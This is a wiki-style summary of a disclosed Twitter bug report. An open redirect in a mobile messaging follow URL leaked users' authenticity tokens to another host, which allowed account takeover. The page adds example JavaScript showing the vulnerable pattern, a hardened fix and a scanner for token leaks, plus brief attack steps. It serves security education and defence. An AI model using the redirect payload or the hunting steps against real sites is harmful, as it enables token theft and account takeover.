Open Redirect leak of authenticity token leads to full account takeover

From Hackipedia
Hackerone #49759
Target: Twitter
Target Module:
Type: Open Redirect
Payload:
Original: Link
CVE:

When viewing private messages on Twitter's mobile site, you could choose to follow the user you were talking to, using this URL:

mobile.twitter.com/messages/follow?recipient=user_to_follow

seifelsallamy found that a URL could be placed in the recipient parameter, like so:

mobile.twitter.com/messages/follow?recipient=/example.com

This would redirect the user to example.com and, worse, POST the user's authenticity token to example.com along with the follow request. An attacker controlling the destination host could capture that token and use it to take over the victim's Twitter account, so an open redirect that carries a form submission with it is considerably more serious than a plain redirect.
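The bug class, as an added example that is not code from the report or from Twitter. It assumes one plausible mechanism: the follow form's action was built by prefixing "/" to the raw recipient value, so "/example.com" becomes "//example.com", a protocol-relative URL that browsers resolve to https://example.com/. The handle rule in the hardened version (1 to 15 letters, digits or underscores) is also an assumption.

```javascript
// Added example (not from the report or from Twitter's code).
// Assumed mechanism: the form action was built as "/" + recipient.
const ORIGIN = "https://mobile.twitter.com";

// Vulnerable: trusts the recipient parameter when building the form action.
// "/example.com" becomes "//example.com", which resolves off-origin.
function vulnerableFollowAction(recipient) {
  return new URL("/" + recipient, ORIGIN).href;
}

// What the browser submits when the follow form is posted: the action
// decides which host receives the authenticity token.
function simulateFollowPost(action, authenticityToken) {
  const target = new URL(action);
  const body = new URLSearchParams({ authenticity_token: authenticityToken });
  return {
    host: target.host,
    sameOrigin: target.origin === ORIGIN,
    body: body.toString(),
  };
}

// Hardened: only accept a value shaped like a handle (assumed rule), then
// re-check that the resolved action never leaves the expected origin.
const HANDLE_RE = /^[A-Za-z0-9_]{1,15}$/;

function safeFollowAction(recipient) {
  if (!HANDLE_RE.test(recipient)) {
    throw new Error("rejected recipient: not a handle");
  }
  const url = new URL("/" + encodeURIComponent(recipient), ORIGIN);
  if (url.origin !== ORIGIN) {
    throw new Error("rejected recipient: action left " + ORIGIN);
  }
  return url.href;
}

// Demo: where the token goes in the vulnerable and hardened cases.
console.log(simulateFollowPost(vulnerableFollowAction("/example.com"), "secret-token"));
console.log(safeFollowAction("user_to_follow"));
```

The second check in safeFollowAction is deliberate: an allow-list on the input is the real fix, but asserting on the resolved origin catches any future change to how the path is assembled.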

How To Perform

  1. Find an open redirect.
  2. Use Wireshark or the browser's Network inspector to look for any data being passed to a third party: check the query string and request body of every request that leaves the target's own origin, not just the redirect response itself.
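Step 2 automated, as an added example that is not part of the original page. It takes request records of the kind you can export from a proxy or the browser's Network tab (the sample capture below is constructed, and the first-party host list and secret-field pattern are assumptions) and flags secret-looking parameters sent to any host outside the target's own.

```javascript
// Added example (not from the report). Flags secret-looking fields that a
// captured request sends to a host outside the target's own domains.
const TARGET_HOSTS = ["twitter.com", "mobile.twitter.com"]; // assumed first-party set
const SECRET_FIELD = /token|session|csrf|secret|auth/i;     // assumed naming pattern

function isFirstParty(host) {
  return TARGET_HOSTS.some((h) => host === h || host.endsWith("." + h));
}

// Parameter names that look like secrets, from the query string and from a
// form-encoded body (the shape a redirected HTML form submission has).
function secretFields(req) {
  const found = [];
  const url = new URL(req.url);
  for (const name of url.searchParams.keys()) {
    if (SECRET_FIELD.test(name)) found.push("query:" + name);
  }
  if (req.body) {
    for (const name of new URLSearchParams(req.body).keys()) {
      if (SECRET_FIELD.test(name)) found.push("body:" + name);
    }
  }
  return found;
}

function findThirdPartyLeaks(requests) {
  const leaks = [];
  for (const req of requests) {
    const host = new URL(req.url).host;
    if (isFirstParty(host)) continue;
    const fields = secretFields(req);
    if (fields.length > 0) {
      leaks.push({ method: req.method, host, fields });
    }
  }
  return leaks;
}

// Constructed capture: a benign first-party POST, a static asset with no
// secrets, the redirected follow form landing on the attacker's host, and
// a GET that carries a session id in its query string.
const SAMPLE_CAPTURE = [
  { method: "POST", url: "https://mobile.twitter.com/messages/follow",
    body: "authenticity_token=abc123&recipient=user_to_follow" },
  { method: "GET", url: "https://abs.twimg.com/app.js", body: "" },
  { method: "POST", url: "https://example.com/",
    body: "authenticity_token=abc123&recipient=user_to_follow" },
  { method: "GET", url: "https://example.com/?session_id=42", body: "" },
];

console.log(findThirdPartyLeaks(SAMPLE_CAPTURE));
```

Run it over a real export after triggering the redirect; any hit whose fields include a CSRF or session value is the finding, and the host in the hit is who received it.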